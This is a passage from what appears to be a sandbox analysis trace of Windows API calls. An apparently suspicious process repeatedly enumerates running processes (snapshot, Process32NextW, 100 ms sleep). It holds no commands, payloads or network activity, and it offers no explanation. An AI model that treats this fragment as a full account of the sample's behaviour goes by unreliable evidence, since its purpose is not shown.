lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.150] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.151] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.151] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.151] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.152] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.152] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.152] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.153] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.153] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.153] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.153] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.154] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.154] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.154] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0213.155] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.155] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.155] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.156] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.156] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.156] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0213.157] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0213.157] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.157] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0213.158] Sleep (dwMilliseconds=0x64) [0213.293] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140 [0213.729] Process32FirstW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.729] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.730] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.730] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.730] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.731] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.731] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.731] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.732] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.732] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.732] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.733] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.733] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.733] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.734] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.734] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.734] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.735] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.735] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0213.735] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.736] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.736] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.736] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.737] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.737] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0213.737] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0213.737] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.738] Process32NextW (in: hSnapshot=0x140, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0213.738] Sleep (dwMilliseconds=0x64) [0213.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x144 [0213.849] Process32FirstW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.850] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.850] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.850] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.851] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.851] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.851] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.852] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.852] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.852] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.853] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.853] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.853] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.854] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.854] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.854] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.855] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.855] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.855] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0213.855] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.856] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.856] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.856] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.857] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.857] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0213.857] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0213.858] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.858] Process32NextW (in: hSnapshot=0x144, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0213.858] Sleep (dwMilliseconds=0x64) [0213.992] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0213.993] Process32FirstW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.994] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.994] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: 